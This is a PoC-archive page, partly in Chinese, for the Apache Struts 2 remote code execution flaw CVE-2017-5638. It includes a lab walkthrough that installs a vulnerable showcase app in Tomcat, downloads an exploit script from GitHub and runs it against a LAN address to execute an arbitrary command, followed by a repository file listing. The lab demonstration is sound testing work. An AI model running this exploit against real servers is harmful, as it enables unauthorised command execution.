关联漏洞
标题:
Apache Struts 2 输入验证错误漏洞
(CVE-2017-5638)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞,该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有#cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。
描述
test struts2 vulnerability CVE-2017-5638 in Mac OS X
介绍
# test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X
test struts2 vulnerability CVE-2017-5638 in Mac OS X
###download test web app and run it in tomcat
```
#install tomcat
brew install tomcat
#confirm where the tomcat installed
ls -lF `which catalina`
#confirm tomcat home dir
ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec
#create web app "struts2" in webapps of tomcat home
mkdir /usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2
#get web app deployment file
wget https://github.com/nixawk/labs/raw/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war
#expand deployment file into the web app dir
brew install p7zip
7z x struts2_2.3.15.1-showcase.war -o/usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2
#confirm web app files
ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2
#run tomcat
catalina run
```
confirm the web app by visit http://localhost:8080/struts2
###from another machine, run exploit script to get ability to run any command
```
#get exploit tool script
wget https://github.com/nixawk/labs/raw/master/CVE-2017-5638/exploit-urllib2.py
#run exploit tool script
python exploit-urllib2.py http://192.168.11.5:8080/struts2/ "echo any command can be run > /tmp/yyy"
```
###go back to the web machine, check the file /tmp/yyy has been injected
```
cat /tmp/yyy
```
video: https://youtu.be/iQ_f-eG-EXg
文件快照
[4.0K] /data/pocs/e4e57c938df5db68350568303caade8cfbff2612
├── [1.1K] LICENSE
├── [1.3K] README.md
├── [ 940] remote-code-exec.java
└── [4.0K] struts2_test
├── [4.0K] lib
│ ├── [ 41K] asm-commons.jar
│ ├── [ 52K] asm.jar
│ ├── [ 28K] asm-tree.jar
│ ├── [ 67K] commons-fileupload.jar
│ ├── [170K] commons-io.jar
│ ├── [376K] commons-lang.jar
│ ├── [909K] freemarker.jar
│ ├── [600K] javassist.jar
│ ├── [223K] ognl.jar
│ ├── [807K] struts2-core.jar
│ └── [655K] xwork-core.jar
├── [4.0K] out
│ ├── [4.0K] artifacts
│ │ └── [4.0K] struts2_test_war_exploded
│ │ ├── [ 223] error.jsp
│ │ ├── [ 525] index.jsp
│ │ ├── [ 244] success.jsp
│ │ └── [4.0K] WEB-INF
│ │ ├── [4.0K] classes
│ │ │ ├── [4.0K] pkg
│ │ │ │ └── [1.9K] uploadFile.class
│ │ │ └── [ 463] struts.xml
│ │ ├── [4.0K] lib
│ │ │ ├── [ 41K] asm-commons.jar
│ │ │ ├── [ 52K] asm.jar
│ │ │ ├── [ 28K] asm-tree.jar
│ │ │ ├── [ 67K] commons-fileupload.jar
│ │ │ ├── [170K] commons-io.jar
│ │ │ ├── [376K] commons-lang.jar
│ │ │ ├── [909K] freemarker.jar
│ │ │ ├── [600K] javassist.jar
│ │ │ ├── [223K] ognl.jar
│ │ │ ├── [807K] struts2-core.jar
│ │ │ └── [655K] xwork-core.jar
│ │ └── [ 605] web.xml
│ └── [4.0K] production
│ └── [4.0K] struts2_test
│ ├── [4.0K] pkg
│ │ └── [1.9K] uploadFile.class
│ └── [ 463] struts.xml
├── [4.0K] src
│ ├── [4.0K] pkg
│ │ └── [1.3K] uploadFile.java
│ └── [ 463] struts.xml
├── [1.2K] struts2_test.iml
└── [4.0K] web
├── [ 223] error.jsp
├── [ 525] index.jsp
├── [ 244] success.jsp
└── [4.0K] WEB-INF
└── [ 605] web.xml
16 directories, 40 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。